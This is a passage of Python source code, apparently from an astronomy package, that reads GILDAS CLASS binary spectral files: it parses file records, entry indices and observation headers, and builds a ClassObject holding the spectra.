integer(kind=4) :: sourc(3) ! 4- 6: source name integer(kind=8) :: num ! 5- 6: observation number character(len=12) :: csour ! 4- 6: source read from index
integer(kind=4) :: line(3) ! 7- 9: line name integer(kind=4) :: sourc(3) ! 7- 9: source name character(len=12) :: cline ! 7- 9: line read from index
integer(kind=4) :: teles(3) ! 10-12: telescope name integer(kind=4) :: line(3) ! 10-12: line name character(len=12) :: ctele ! 10-12: telescope read from index
integer(kind=4) :: dobs ! 13 : observation date [class_date] integer(kind=4) :: teles(3) ! 13-15: telescope name integer(kind=4) :: dobs ! 13 : date obs. read from index
integer(kind=4) :: dred ! 14 : reduction date [class_date] integer(kind=4) :: dobs ! 16 : observation date [class_date] integer(kind=4) :: dred ! 14 : date red. read from index
real(kind=4) :: off1 ! 15 : lambda offset [radian] integer(kind=4) :: dred ! 17 : reduction date [class_date] real(kind=4) :: off1 ! 15 : read offset 1
real(kind=4) :: off2 ! 16 : beta offset [radian] real(kind=4) :: off1 ! 18 : lambda offset [radian] real(kind=4) :: off2 ! 16 : read offset 2
integer(kind=4) :: typec ! 17 : coordinates types real(kind=4) :: off2 ! 19 : beta offset [radian] integer(kind=4) :: type ! 17 : type of read offsets
integer(kind=4) :: kind ! 18 : data kind integer(kind=4) :: typec ! 20 : coordinates types integer(kind=4) :: kind ! 18 : type of observation
integer(kind=4) :: qual ! 19 : data quality integer(kind=4) :: kind ! 21 : data kind integer(kind=4) :: qual ! 19 : Quality read from index
integer(kind=4) :: scan ! 20 : scan number integer(kind=4) :: qual ! 22 : data quality integer(kind=4) :: scan ! 20 : Scan number read from index
integer(kind=4) :: proc ! 21 : procedure type integer(kind=4) :: scan ! 23 : scan number real(kind=4) :: posa ! 21 : Position angle
integer(kind=4) :: itype ! 22 : observation type integer(kind=4) :: proc ! 24 : procedure type integer(kind=4) :: subscan ! 22 : Subscan number
real(kind=4) :: houra ! 23 : hour angle [radian] integer(kind=4) :: itype ! 25 : observation type integer(kind=4) :: pad(10) ! 23-32: Pad to 32 words
integer(kind=4) :: project ! 24 : project name real(kind=4) :: houra ! 26 : hour angle [radian]
integer(kind=4) :: pad1 ! 25 : unused word integer(kind=4) :: project(2) ! 27 : project name
integer(kind=4) :: bpc ! 26 : baseline bandpass cal status integer(kind=4) :: bpc ! 29 : baseline bandpass cal status
integer(kind=4) :: ic ! 27 : instrumental cal status integer(kind=4) :: ic ! 30 : instrumental cal status
integer(kind=4) :: recei ! 28 : receiver number integer(kind=4) :: recei ! 31 : receiver number
real(kind=4) :: ut ! 29 : UT [s] real(kind=4) :: ut ! 32 : UT [s]
integer(kind=4) :: pad2(3) ! 30-32: padding to 32 4-bytes word
equivalently
integer(kind=obsnum_length) :: num ! [ ] Observation number
integer(kind=4) :: ver ! [ ] Version number
integer(kind=4) :: teles(3) ! [ ] Telescope name
integer(kind=4) :: dobs ! [MJD-60549] Date of observation
integer(kind=4) :: dred ! [MJD-60549] Date of reduction
integer(kind=4) :: typec ! [ code] Type of coordinates
integer(kind=4) :: kind ! [ code] Type of data
integer(kind=4) :: qual ! [ code] Quality of data
integer(kind=4) :: subscan ! [ ] Subscan number
integer(kind=obsnum_length) :: scan ! [ ] Scan number
"""
"""
index.f90:
call conv%read%i8(data(1), indl%bloc, 1) ! bloc
call conv%read%i4(data(3), indl%word, 1) ! word
call conv%read%i8(data(4), indl%num, 1) ! num
call conv%read%i4(data(6), indl%ver, 1) ! ver
call conv%read%cc(data(7), indl%csour, 3) ! csour
call conv%read%cc(data(10),indl%cline, 3) ! cline
call conv%read%cc(data(13),indl%ctele, 3) ! ctele
call conv%read%i4(data(16),indl%dobs, 1) ! dobs
call conv%read%i4(data(17),indl%dred, 1) ! dred
call conv%read%r4(data(18),indl%off1, 1) ! off1
call conv%read%r4(data(19),indl%off2, 1) ! off2
call conv%read%i4(data(20),indl%type, 1) ! type
call conv%read%i4(data(21),indl%kind, 1) ! kind
call conv%read%i4(data(22),indl%qual, 1) ! qual
call conv%read%r4(data(23),indl%posa, 1) ! posa
call conv%read%i8(data(24),indl%scan, 1) ! scan
call conv%read%i4(data(26),indl%subscan,1) ! subscan
if (isv3) then
call conv%read%r8(data(27),indl%ut, 1) ! ut
else
"""
def _read_indices(f, file_description):
    """
    Read every Entry Index in the file and return them as a list of dicts.

    `file_description` is the dict returned by `_read_first_record`.
    Entry numbers are 1-indexed in CLASS files, and `xnext` is the next
    *free* entry, hence `xnext - 1` entries are read.
    """
    #if file_description['version'] in (1,2):
    #    extension_positions = (file_description['aex']-1)*file_description['reclen']*4
    #    all_indices = {extension:
    #                   [_read_index(f,
    #                                filetype=file_description['version'],
    #                                entry=ii,
    #                                #position=position,
    #                                )
    #                    for ii in range(file_description['lex1'])]
    #                   for extension,position in enumerate(extension_positions)
    #                   if position > 0
    #                   }
    #elif file_description['version'] == 1:
    # NOTE(review): `extension_positions` is computed but never used below;
    # kept for parity with the commented-out legacy code path above.
    extension_positions = ((file_description['aex'].astype('int64')-1)
                           *file_description['reclen']*4)
    all_indices = [_read_index(f,
                               filetype=file_description['version'],
                               # 1-indexed files
                               entry_number=ii+1,
                               file_description=file_description,
                               )
                   for ii in range(file_description['xnext']-1)]
    #else:
    #    raise ValueError("Invalid file version {0}".format(file_description['version']))
    return all_indices
def _find_index(entry_number, file_description, return_position=False):
    """Locate the Entry Index for the 1-based `entry_number`.

    Parameters
    ----------
    entry_number : int
        1-indexed entry number.
    file_description : dict
        Must provide 'gex', 'lex1', 'lexn', 'lind', 'reclen' and 'aex'
        (as built by the `_read_first_record_*` functions).
    return_position : bool
        If True, return the absolute byte offset of the index; otherwise
        return the (record, word) pair.
    """
    if file_description['gex'] == 10:
        # Linear growth: a fixed lex1 entries per extension.
        # BUG FIX: use '//' -- under Python 3 true division '/' yielded a
        # float, breaking the list indexing and f.seek() downstream.
        kex = (entry_number-1)//file_description['lex1'] + 1
    else:
        # exponential growth:
        #kex = gi8_dicho(file_description['nex'], file_description['lexn'], entry_number) - 1
        kex = len([xx for xx in file_description['lexn'] if xx<entry_number])
    # ken: relative entry number within the extension (starts from 1)
    ken = entry_number - file_description['lexn'][kex-1]
    # kb: relative record offset (from 0) in the extension where the Entry
    # Index starts.  NB: there can be a non-integer number of Entry
    # Indexes per record.
    kb = ((ken-1)*file_description['lind'])//file_description['reclen']
    # Subtract 1: 'aex' is 1-indexed
    kbl = (file_description['aex'][kex-1]+kb)-1
    # k: the first word of the Entry Index within that record
    k = ((ken-1)*file_description['lind']) % file_description['reclen']
    if return_position:
        return (kbl*file_description['reclen']+k)*4
    else:
        return kbl,k
def _read_index(f, filetype='v1', DEBUG=False, clic=False, position=None,
                entry_number=None, file_description=None):
    """
    Read a single Entry Index from a CLASS file and return it as a dict.

    Either seek to an absolute byte `position`, or pass a 1-indexed
    `entry_number` together with `file_description` so the position can be
    computed via `_find_index`.  Keys are normalized so both the v1
    (X-prefixed) and v2 spellings are present in the returned dict.

    Raises ValueError when the source/line/telescope strings do not look
    like valid ASCII (i.e. the position did not hold a real index).
    """
    if position is not None:
        f.seek(position)
    if entry_number is not None:
        indpos = _find_index(entry_number, file_description, return_position=True)
        f.seek(indpos)
    x0 = f.tell()

    if filetype in ('1A ','v1', 1):
        log.debug('Index filetype 1A')
        index = {
                "XBLOC":_read_int32(f),
                "XNUM":_read_int32(f),
                "XVER":_read_int32(f),
                "XSOURC":_read_word(f,12),
                "XLINE":_read_word(f,12),
                "XTEL":_read_word(f,12),
                "XDOBS":_read_int32(f),
                "XDRED":_read_int32(f),
                "XOFF1":_read_float32(f),# first offset (real, radians)
                "XOFF2":_read_float32(f),# second offset (real, radians)
                "XTYPE":_read_int32(f),# coordinate system ('EQ'', 'GA', 'HO')
                "XKIND":_read_int32(f),# Kind of observation (0: spectral, 1: continuum, )
                "XQUAL":_read_int32(f),# Quality (0-9)
                "XSCAN":_read_int32(f),# Scan number
        }
        # Mirror v1 names onto the v2 key spellings for uniform access.
        index['BLOC'] = index['XBLOC'] # v2 compatibility
        index['WORD'] = 1 # v2 compatibility
        index['SOURC'] = index['CSOUR'] = index['XSOURC']
        index['DOBS'] = index['CDOBS'] = index['XDOBS']
        index['CTELE'] = index['XTEL']
        index['LINE'] = index['XLINE']
        index['OFF1'] = index['XOFF1']
        index['OFF2'] = index['XOFF2']
        index['QUAL'] = index['XQUAL']
        index['SCAN'] = index['XSCAN']
        index['KIND'] = index['XKIND']
        if clic: # use header set up in clic
            nextchunk = {
                "XPROC":_read_int32(f),# "procedure type"
                "XITYPE":_read_int32(f),#
                "XHOURANG":_read_float32(f),#
                "XPROJNAME":_read_int32(f),#
                "XPAD1":_read_int32(f),
                "XBPC" :_read_int32(f),
                "XIC" :_read_int32(f),
                "XRECEI" :_read_int32(f),
                "XUT":_read_float32(f),
                "XPAD2":numpy.fromfile(f,count=3,dtype='int32') # BLANK is NOT ALLOWED!!! It is a special KW
            }
        else:
            nextchunk = {"XPOSA":_read_float32(f),
                         "XSUBSCAN":_read_int32(f),
                         'XPAD2': numpy.fromfile(f,count=10,dtype='int32'),
                         }
            nextchunk['SUBSCAN'] = nextchunk['XSUBSCAN']
            nextchunk['POSA'] = nextchunk['XPOSA']
        index.update(nextchunk)
        # A v1 Entry Index should span exactly 128 bytes; consume any
        # remainder so the file position stays consistent.
        if (f.tell() - x0 != 128):
            missed_bits = (f.tell()-x0)
            X = f.read(128-missed_bits)
            if DEBUG: print("read_index missed %i bits: %s" % (128-missed_bits,X))
            #raise IndexError("read_index did not successfully read 128 bytes at %i. Read %i bytes." % (x0,f.tell()-x0))
        if any(not is_ascii(index[x]) for x in ('XSOURC','XLINE','XTEL')):
            raise ValueError("Invalid index read from {0}.".format(x0))
    elif filetype in ('2A ','v2', 2):
        log.debug('Index filetype 2A')
        index = {
                "BLOC"   : _read_int64(f)  , #(data(1), 1) ! bloc
                "WORD"   : _read_int32(f)  , #(data(3), 1) ! word
                "NUM"    : _read_int64(f)  , #(data(4), 1) ! num
                "VER"    : _read_int32(f)  , #(data(6), 1) ! ver
                "CSOUR"  : _read_word(f,12), #(data(7), 3) ! csour
                "CLINE"  : _read_word(f,12), #(data(10), 3) ! cline
                "CTELE"  : _read_word(f,12), #(data(13), 3) ! ctele
                "DOBS"   : _read_int32(f)  , #(data(16), 1) ! dobs
                "DRED"   : _read_int32(f)  , #(data(17), 1) ! dred
                "OFF1"   : _read_float32(f), #(data(18), 1) ! off1
                "OFF2"   : _read_float32(f), #(data(19), 1) ! off2
                "TYPE"   : _read_int32(f)  , #(data(20), 1) ! type
                "KIND"   : _read_int32(f)  , #(data(21), 1) ! kind
                "QUAL"   : _read_int32(f)  , #(data(22), 1) ! qual
                "POSA"   : _read_float32(f), #(data(23), 1) ! posa
                "SCAN"   : _read_int64(f)  , #(data(24), 1) ! scan
                "SUBSCAN": _read_int32(f)  , #(data(26), 1) ! subscan
                }
        #last24bits = f.read(24)
        #log.debug("Read 24 bits: '{0}'".format(last24bits))
        if any((is_all_null(index[x]) or not is_ascii(index[x]))
               for x in ('CSOUR','CLINE','CTELE')):
            raise ValueError("Invalid index read from {0}.".format(x0))
        # Mirror v2 names onto the v1 (X-prefixed) spellings.
        index['SOURC'] = index['XSOURC'] = index['CSOUR']
        index['LINE'] = index['XLINE'] = index['CLINE']
        index['XKIND'] = index['KIND']
        try:
            index['DOBS'] = index['XDOBS'] = index['CDOBS']
        except KeyError:
            index['CDOBS'] = index['XDOBS'] = index['DOBS']
    else:
        raise NotImplementedError("Filetype {0} not implemented.".format(filetype))

    # from kernel/lib/gsys/date.f90: gag_julda
    # Convert the CLASS day count into a (fractional) year; the float
    # division here is intentional.
    class_dobs = index['DOBS']
    index['DOBS'] = ((class_dobs + 365*2025)/365.2425 + 1)
    # SLOW
    #index['DATEOBS'] = Time(index['DOBS'], format='jyear')
    #index['DATEOBSS'] = index['DATEOBS'].iso
    log.debug("Indexing finished at {0}".format(f.tell()))
    return index
def _read_header(f, type=0, position=None):
    """
    Read a header entry from a CLASS file
    (helper function)

    Parameters
    ----------
    f : file-like
        Open binary file, positioned at (or seekable to) the header.
    type : str
        Section name; must be a key of `keys_lengths` (e.g. 'GENERAL',
        'POSITION', 'SPECTRO').  Unrecognized types yield an empty dict.
        (The parameter name shadows the builtin but is kept for
        backward compatibility with keyword callers.)
    position : int, optional
        Absolute byte offset to seek to before reading.

    Returns
    -------
    dict
        Mapping of header keyword -> scalar value.
    """
    if position is not None:
        f.seek(position)
    if type in keys_lengths:
        hdrsec = [(key, numpy.fromfile(f, count=1, dtype=dtype)[0])
                  for (key, _count, dtype) in keys_lengths[type]]
        return dict(hdrsec)
    # Unknown section types are tolerated and produce an empty header.
    # (The old `raise ValueError` that followed here was unreachable dead
    # code after the returns above and has been removed.)
    return {}
def _read_first_record(f):
    """Dispatch to the v1 or v2 first-record parser, based on the 4-byte
    file code at the very start of `f`."""
    f.seek(0)
    code = f.read(4)
    if fileversion_dict[code] != 'v1':
        return _read_first_record_v2(f)
    return _read_first_record_v1(f)
def _read_first_record_v1(f, record_length_words=128):
    r"""
    Parse the first record of a v1 CLASS file into a file-description dict.

    Position & Parameter & Fortran Kind & Purpose \\
    \hline
    1 & {\tt code} & Character*4 & File code \\
    2 & {\tt next} & Integer*4 & Next free record \\
    3 & {\tt lex} & Integer*4 & Length of first extension (number of entries) \\
    4 & {\tt nex} & Integer*4 & Number of extensions \\
    5 & {\tt xnext} & Integer*4 & Next available entry number \\
    6:2*{\tt reclen} & {\tt ex(:)} & Integer*4 & Array of extension addresses

    from classic_mod.f90:
        integer(kind=4) :: code ! 1 File code
        integer(kind=4) :: next ! 2 Next free record
        integer(kind=4) :: lex ! 3 Extension length (number of entries)
        integer(kind=4) :: nex ! 4 Number of extensions
        integer(kind=4) :: xnext ! 5 Next available entry number
        integer(kind=4) :: aex(mex_v1) ! 6:256 Extension addresses

    from old (<dec2013) class, file.f90:
        read(ilun,rec=1,err=11,iostat=ier) ibx%code,ibx%next, &
             & ibx%ilex,ibx%imex,ibx%xnext
    also uses filedesc_v1tov2 from classic/lib/file.f90
    """
    f.seek(0)
    # Fixed fields from the record header, plus v1 defaults for the fields
    # a v2 header would carry explicitly.
    file_description = {
        'code': f.read(4),
        'next': _read_int32(f),
        'lex': _read_int32(f),
        'nex': _read_int32(f),
        'xnext': _read_int32(f),
        'gex': 10.,
        'vind': 1, # classic_vind_v1 packages/classic/lib/classic_mod.f90
        'version': 1,
        'nextrec': 3,
        'nextword': 1,
        'lind': 32, #classic_lind_v1 packages/classic/lib/classic_mod.f90
        'kind': 'unknown',
        'flags': 0,
    }
    file_description['reclen'] = record_length_words # should be 128w = 512 bytes
    # Remaining words of the record hold the extension address table;
    # zeros mark unused slots.
    ex = np.fromfile(f, count=(record_length_words*2-5), dtype='int32')
    file_description['ex'] = ex[ex!=0]
    file_description['nextrec'] = file_description['next'] # this can't be...
    file_description['lex1'] = file_description['lex'] # number of entries
    # Cumulative entry counts per extension (linear growth in v1).
    file_description['lexn'] = (np.arange(file_description['nex']+1) *
                                file_description['lex1'])
    file_description['nentries'] = np.sum(file_description['lexn'])
    file_description['aex'] = file_description['ex'][:file_description['nex']]
    #file_description['version'] = fileversion_dict[file_description['code']]
    # 4 (code) + 4*4 (ints) + (2*128-5)*4 bytes = 1024 bytes read so far.
    assert f.tell() == 1024
    # Something is not quite right with the 'ex' parsing
    #assert len(file_description['ex']) == file_description['nex']
    return file_description
def _read_first_record_v2(f):
    r"""Read the version-2 file description record (packages/classic/lib/file.f90).

    Record layout (word positions / Fortran kinds)::

        1         code      Character*4  File code
        2         reclen    Integer*4    Record length [words]
        3         kind      Integer*4    File kind
        4         vind      Integer*4    Index version
        5         lind      Integer*4    Index length [words]
        6         flags     Integer*4    Bit flags (#1: single or multiple; #2-32 provision)
        7:8       xnext     Integer*8    Next available entry number
        9:10      nextrec   Integer*8    Next record which contains free space
        11        nextword  Integer*4    Next free word in this record
        12        lex1      Integer*4    Length of first extension index [entries]
        13        nex       Integer*4    Number of extensions
        14        gex       Integer*4    Extension growth rule
        15:reclen aex(:)    Integer*8    Array of extension addresses

    Returns a dict describing the file, including the cumulative entry counts
    ``lexn`` and the nonzero extension addresses ``aex``.
    """
    f.seek(0)
    file_description = {
        'code': f.read(4),
        'reclen': _read_int32(f),
        'kind': _read_int32(f),
        'vind': _read_int32(f),
        'lind': _read_int32(f),
        'flags': _read_int32(f),
        'xnext': _read_int64(f),
        'nextrec': _read_int64(f),
        'nextword': _read_int32(f),
        'lex1': _read_int32(f),
        'nex': _read_int32(f),
        'gex': _read_int32(f),
    }
    # lexn[i] = cumulative number of entries indexed by extensions 1..i
    # (leading 0 so lexn has nex+1 elements).
    file_description['lexn'] = [0]
    if file_description['gex'] == 10:
        # Linear growth: every extension holds lex1 entries.
        for ii in range(1, file_description['nex'] + 1):
            file_description['lexn'].append(file_description['lexn'][-1] +
                                            file_description['lex1'])
    else:
        # Exponential growth. Only growth with mantissa 2.0 is supported
        # (fortran: nent = int(file%desc%lex1,kind=8) * 2_8**(iex-1)).
        # Bugfix: iterate the full 1..nex range; the loop previously stopped
        # at range(1, nex), dropping the last extension and leaving lexn one
        # element shorter than in the linear branch.
        for ii in range(1, file_description['nex'] + 1):
            nent = int(file_description['lex1'] * 2 ** (ii - 1))
            file_description['lexn'].append(file_description['lexn'][-1] + nent)
    file_description['nentries'] = np.sum(file_description['lexn'])
    record_length_words = file_description['reclen']
    # Addresses are int64, i.e. 2 words each; (reclen-15) words remain in the
    # record.  Bugfix: use integer division -- fromfile's count must be an int
    # ('/' yields a float under py3 / future division).
    aex = numpy.fromfile(f, count=(record_length_words - 15) // 2,
                         dtype='int64')
    file_description['aex'] = aex[aex != 0]
    assert len(file_description['aex']) == file_description['nex']
    file_description['version'] = 2
    return file_description
def gi8_dicho(ninp, lexn, xval, ceil=True):
    """
    Dichotomic (binary) search over the ordered array *lexn*.

    Mirrors the fortran routine::

        ! Find ival such as
        !   X(ival-1) < xval <= X(ival)     (ceiling mode)
        ! or
        !   X(ival) <= xval < X(ival+1)     (floor mode)
        call gi8_dicho(nex,file%desc%lexn,entry_num,.true.,kex,error)

    Parameters
    ----------
    ninp : int
        Number of input points (1-based upper bound of the search).
    lexn : sequence of int
        Ordered input values.
    xval : int
        The value searched for.
    ceil : bool
        Ceiling-mode flag; only ceiling mode is implemented here.

    Returns
    -------
    int : the 1-based position in the array.
    """
    lo = 1
    hi = ninp
    # Ceiling mode: shrink [lo, hi] until they are adjacent.
    while hi > lo + 1:
        mid = (lo + hi) // 2
        if lexn[mid - 1] < xval:
            lo = mid
        else:
            hi = mid
    return hi
def _read_obshead(f, file_description, position=None):
if file_description['version'] == 1:
return _read_obshead_v1(f, position=position)
if file_description['version'] == 2:
return _read_obshead_v2(f, position=position)
else:
raise ValueError("Invalid file version {0}.".
format(file_description['version']))
def _read_obshead_v2(f, position=None):
    """
    Read a version-2 observation entry descriptor.

    On-disk layout (from the fortran ``classic_entrydesc_t``)::

        word  1     code     Integer*4  observation code
        word  2     version  Integer*4  observation version
        word  3     nsec     Integer*4  number of sections
        words 4-5   nword    Integer*8  number of words
        words 6-7   adata    Integer*8  data address
        words 8-9   ldata    Integer*8  data length
        words 10-11 xnum     Integer*8  entry number

    followed by ``nsec`` section numbers (int32), section lengths (int64) and
    section addresses (int64).  The in-memory fortran type also has padding
    and ``msec`` fields, but those are not stored on disk.

    Returns ``(entry_number, header_dict, {section_number: section_address})``.
    """
    if position is not None:
        f.seek(position)
    else:
        position = f.tell()
    IDcode = f.read(4)
    if IDcode.strip() != '2':
        raise IndexError("Observation Header reading failure at {0}. "
                         "Record does not appear to be an observation header.".
                         format(position))
    f.seek(position)
    entrydescv2_nw1 = 11  # number of words in the first part
    entrydescv2_nw2 = 5   # number of words for one section in the second part
    # Read the fixed first part in on-disk order.
    obshead = {}
    obshead['CODE'] = f.read(4)
    obshead['VERSION'] = _read_int32(f)
    obshead['NSEC'] = _read_int32(f)
    obshead['NWORD'] = _read_int64(f)
    obshead['ADATA'] = _read_int64(f)
    obshead['LDATA'] = _read_int64(f)
    obshead['XNUM'] = _read_int64(f)
    # Then the three per-section arrays, still in on-disk order.
    nsec = obshead['NSEC']
    section_numbers = np.fromfile(f, count=nsec, dtype='int32')
    section_lengths = np.fromfile(f, count=nsec, dtype='int64')
    section_addresses = np.fromfile(f, count=nsec, dtype='int64')
    return obshead['XNUM'], obshead, dict(zip(section_numbers,
                                              section_addresses))
def _read_obshead_v1(f, position=None, verbose=False):
"""
Read the observation header of a CLASS file
(helper function for read_class; should not be used independently)
"""
if position is not None:
f.seek(position)
IDcode = f.read(4)
if IDcode.strip() != '2':
raise IndexError("Observation Header reading failure at {0}. "
"Record does not appear to be an observation header.".
format(f.tell() - 4))
(nblocks, nbyteob, data_address, nheaders, data_length, obindex, nsec,
obsnum) = numpy.fromfile(f, count=8, dtype='int32')
if verbose:
print("nblocks,nbyteob,data_address,data_length,nheaders,obindex,nsec,obsnum",nblocks,nbyteob,data_address,data_length,nheaders,obindex,nsec,obsnum)
print("DATA_LENGTH: ",data_length)
seccodes = numpy.fromfile(f,count=nsec,dtype='int32')
# Documentation says addresses then length: It is apparently wrong
seclen = numpy.fromfile(f,count=nsec,dtype='int32')
secaddr = numpy.fromfile(f,count=nsec,dtype='int32')
if verbose: print("Section codes, addresses, lengths: ",seccodes,secaddr,seclen)
hdr = {'NBLOCKS':nblocks, 'NBYTEOB':nbyteob, 'DATAADDR':data_address,
'DATALEN':data_length, 'NHEADERS':nheaders, 'OBINDEX':obindex,
'NSEC':nsec, 'OBSNUM':obsnum}
#return obsnum,seccodes
return obsnum,hdr,dict(zip(seccodes,secaddr))
# THIS IS IN READ_OBSHEAD!!!
# def _read_preheader(f):
# """
# Not entirely clear what this is, but it is stuff that precedes the actual data
#
# Looks something like this:
# array([ 1, -2, -3, -4, -14,
# 9, 17, 18, 25, 55,
# 64, 81, 99, -1179344801, 979657591,
#
# -2, -3, -4, -14 indicate the 4 header types
# 9,17,18,25 *MAY* indicate the number of bytes in each
#
#
# HOW is it indicated how many entries there are?
# """
# # 13 comes from counting 1, -2,....99 above
# numbers = np.fromfile(f, count=13, dtype='int32')
# sections = [n for n in numbers if n in header_id_numbers]
# return sections
def downsample_1d(myarr, factor, estimator=np.mean, weight=None):
    """
    Downsample a 1D array by averaging over *factor* pixels.
    Crops the right side if the shape is not a multiple of factor.

    This code is pure numpy and should be fast.

    Parameters
    ----------
    myarr : np.ndarray
        1-dimensional input data.
    factor : int
        Downsampling factor.
    estimator : callable
        Defaults to mean.  You can downsample by summing or something else if
        you want a different estimator (e.g., downsampling error: you want to
        sum & divide by sqrt(n)).
    weight : np.ndarray
        An array of weights to use for the downsampling.  If None, assumes
        uniform 1.

    Raises
    ------
    ValueError : if the input is not 1-dimensional.
    """
    if myarr.ndim != 1:
        raise ValueError("Only works on 1d data. Says so in the title.")
    factor = int(factor)
    # Crop to a multiple of factor so the data reshape evenly into
    # (n_out, factor) chunks; row i of the transposed reshape equals the
    # original strided slice crarr[i::factor].
    nkeep = myarr.size - (myarr.size % factor)
    chunks = myarr[:nkeep].reshape(-1, factor).T
    if weight is None:
        dsarr = estimator(chunks, axis=0)
    else:
        # Bugfix: crop the weights like the data -- previously an uncropped
        # weight array produced ragged slices (and a failing concatenate)
        # whenever myarr.size was not a multiple of factor.
        wchunks = np.asarray(weight)[:nkeep].reshape(-1, factor).T
        dsarr = estimator(chunks * wchunks, axis=0)
        warr = estimator(wchunks, axis=0)
        dsarr = dsarr / warr
    return dsarr
# unit test
def test_downsample1d():
    """Regression check: weighted downsampling ignores zero-weight samples."""
    values = np.arange(10)
    wts = np.ones(10)
    wts[5] = 0
    expected = np.array([0.5, 2.5, 4.0, 6.5, 8.5])
    result = downsample_1d(values, 2, weight=wts, estimator=np.mean)
    assert np.all(result == expected)
def read_observation(f, obsid, file_description=None, indices=None,
                     my_memmap=None, memmap=True):
    """
    Read one observation (spectrum + merged header) from a CLASS file.

    Parameters
    ----------
    f : str or file
        Filename or an already-opened binary file object.  When a file object
        is passed with ``memmap=True``, ``my_memmap`` must be supplied.
    obsid : int
        Index of the observation in ``indices``.
    file_description : dict, optional
        Output of ``_read_first_record``; read from ``f`` when omitted.
    indices : list, optional
        Output of ``_read_indices``; read from ``f`` when omitted.
    my_memmap : np.memmap, optional
        Memory map of the file used for fast spectrum access.
    memmap : bool
        Whether to read the spectrum through a memory map.

    Returns
    -------
    spec, hdr : the spectrum data and its header dictionary.
    """
    if isinstance(f, str):
        # Keep the path before rebinding f to the file object.
        # (bugfix: the memmap below previously referenced an undefined name
        # 'filename', raising NameError when a path was passed in)
        filename = f
        f = open(filename, 'rb')
        opened = True
        if memmap:
            my_memmap = numpy.memmap(filename, offset=0, dtype='float32',
                                     mode='r')
        else:
            my_memmap = None
    elif my_memmap is None and memmap:
        raise ValueError("Must pass in a memmap object if passing in a file object.")
    else:
        opened = False

    if file_description is None:
        file_description = _read_first_record(f)
    if indices is None:
        indices = _read_indices(f, file_description)
    index = indices[obsid]
    # Block/word addresses are 1-indexed; one record is reclen 4-byte words.
    obs_position = (index['BLOC']-1)*file_description['reclen']*4 + (index['WORD']-1)*4
    obsnum, obshead, sections = _read_obshead(f, file_description,
                                              position=obs_position)
    header = obshead
    datastart = 0
    for section_id, section_address in iteritems(sections):
        # Section addresses are 1-indexed byte addresses
        # in the current "block"
        sec_position = obs_position + (section_address-1)*4
        temp_hdr = _read_header(f, type=header_id_numbers[section_id],
                                position=sec_position)
        header.update(temp_hdr)
        datastart = max(datastart, f.tell())
    hdr = header
    hdr.update(obshead)  # re-overwrite things
    hdr.update({'OBSNUM': obsnum, 'RECNUM': obsid})
    # LAM/BET (and their offsets) are stored in radians; export degrees.
    hdr.update({'RA': hdr['LAM']/pi*180, 'DEC': hdr['BET']/pi*180})
    hdr.update({'RAoff': hdr['LAMOF']/pi*180, 'DECoff': hdr['BETOF']/pi*180})
    hdr.update({'OBJECT': hdr['SOURC'].strip()})
    hdr.update({'BUNIT': 'Tastar'})
    hdr.update({'EXPOSURE': float(hdr['TIME'])})
    hdr['HDRSTART'] = obs_position
    hdr['DATASTART'] = datastart
    hdr.update(indices[obsid])
    # Apparently the data are still valid in this case?
    #if hdr['XNUM'] != obsid+1:
    #    log.error("The spectrum read was {0} but {1} was requested.".
    #              format(hdr['XNUM']-1, obsid))
    if hdr['KIND'] == 1:  # continuum
        nchan = hdr['NPOIN']
    elif 'NCHAN' in hdr:
        nchan = hdr['NCHAN']
    else:
        # Bugfix: this branch used to drop into an ipdb debugger session
        # (leftover debugging hook); fail loudly instead.
        log.error("No NCHAN in header. This is not a spectrum.")
        raise ValueError("No NCHAN in header. This is not a spectrum.")
    # There may be a 1-channel offset? CHECK!!!
    # (changed by 1 pixel - October 14, 2014)
    # (changed back - October 21, 2014 - I think the ends are just bad, but
    # not zero.)
    f.seek(datastart-1)
    spec = _read_spectrum(f, position=datastart-1, nchan=nchan,
                          memmap=memmap, my_memmap=my_memmap)

    if opened:
        f.close()

    return spec, hdr
def _read_spectrum(f, position, nchan, my_memmap=None, memmap=True):
if position != f.tell():
log.warn("Reading data from {0}, but the file is wound "
"to {1}.".format(position, f.tell()))
if memmap:
here = position
#spectrum = numpy.memmap(filename, offset=here, dtype='float32',
# mode='r', shape=(nchan,))
spectrum = my_memmap[here/4:here/4+nchan]
f.seek(here+nchan*4)
else:
f.seek(position)
spectrum = numpy.fromfile(f,count=nchan,dtype='float32')
return spectrum
def _spectrum_from_header(fileobj, header, memmap=None):
    """
    Read the spectrum described by *header* from *fileobj*.

    Uses NCHAN (spectra) or NPOIN (continuum) as the channel count.
    Bugfix: the channel-count expression referenced an undefined name
    ``hdr`` instead of the ``header`` parameter, raising NameError.
    """
    return _read_spectrum(fileobj, position=header['DATASTART'],
                          nchan=header['NCHAN'] if 'NCHAN' in header
                          else header['NPOIN'],
                          my_memmap=memmap)
def clean_header(header):
    """
    Return a FITS-safe copy of *header*: keys truncated to 8 characters,
    small arrays (size 2..10) expanded into numbered keys (7-char prefix +
    index), and other non-scalar values stringified.

    Raises
    ------
    ValueError : if an array value has more than 10 elements.
    """
    cleaned = {}
    for key, value in header.items():
        if isinstance(value, (int, float, str)):
            # Plain scalars are kept as-is (key clipped to 8 chars).
            cleaned[key[:8]] = value
        elif isinstance(value, np.ndarray) and value.size > 1:
            if value.size > 10:
                raise ValueError("Large array being put in header. That's no good. key={0}".format(key))
            # Expand each element into its own numbered key.
            for idx, item in enumerate(value):
                cleaned[key[:7] + str(idx)] = item
        else:
            # Anything else (tuples, size-1 arrays, ...) is stringified.
            cleaned[key[:8]] = str(value)
    return cleaned
class ClassObject(object):
    """
    In-memory handle on a GILDAS CLASS binary file.

    On construction this reads the file-description record and the full index
    table, memory-maps the raw bytes, computes per-entry position angles, and
    groups entries into OTF scans.  Individual spectra are loaded lazily on
    demand through a ``LazyItem`` cache (``self._spectra``).
    """

    def __init__(self, filename, verbose=False):
        # Open the file, read its description record and full index, and
        # memory-map the raw bytes for fast spectrum extraction later.
        t0 = time.time()
        self._file = open(filename, 'rb')
        self.file_description = _read_first_record(self._file)
        self.allind = _read_indices(self._file, self.file_description)
        self._data = np.memmap(self._file, dtype='float32', mode='r')
        if verbose: log.info("Setting _spectra")
        self._spectra = LazyItem(self)
        t1 = time.time()
        if verbose: log.info("Setting posang. t={0}".format(t1-t0))
        self.set_posang()
        t2 = time.time()
        if verbose: log.info("Identifying otf scans. t={0}".format(t2-t1))
        self._identify_otf_scans(verbose=verbose)
        t3 = time.time()
        #self._load_all_spectra()
        if verbose:
            log.info("Loaded CLASS object with {3} indices. Time breakdown:"
                     " {0}s for indices, "
                     "{1}s for posang, and {2}s for OTF scan identification"
